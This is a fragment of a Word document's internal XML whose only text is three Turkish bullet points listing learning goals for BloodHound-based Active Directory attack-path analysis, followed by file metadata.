    <w:p w14:paraId="3630D05E" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:t>BloodHound ile grafiksel saldırı yolu keşfi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B66A43" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:t>Oturum ilişkileri ve ACL temelli analiz yeteneği</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36174416" w14:textId="77777777" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00094A64">
        <w:t>Gerçek saldırı öncesi planlama becerisi kazanma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359BDF3A" w14:textId="17759DF6" w:rsidR="00094A64" w:rsidRPr="00094A64" w:rsidRDefault="00094A64" w:rsidP="00094A64"/>
    <w:p w14:paraId="5E414539" w14:textId="77777777" w:rsidR="00014EFA" w:rsidRDefault="00014EFA"/>
    <w:sectPr w:rsidR="00014EFA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75FE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D05E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D45314"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8A6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3A063A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="026C4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07359">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="321662599">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="873813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FA"/>
    <w:rsid w:val="00014EFA"/>
    <w:rsid w:val="00094A64"/>
    <w:rsid w:val="00C24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DDD3A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{566D60DA-7A16-481C-89B5-6DFBFB767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14E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14E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14E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14E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14E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14E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14E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14E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14E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14E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14E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14E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14EF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14EF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14EF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14EF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14EF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14EF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14E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14E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14E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14E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14E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14EF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14EF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14EF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14E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14EF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14E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7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45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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1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352</Words>
  <Characters>2010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Bahadır Özaydoğdu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-25T13:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-25T13:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>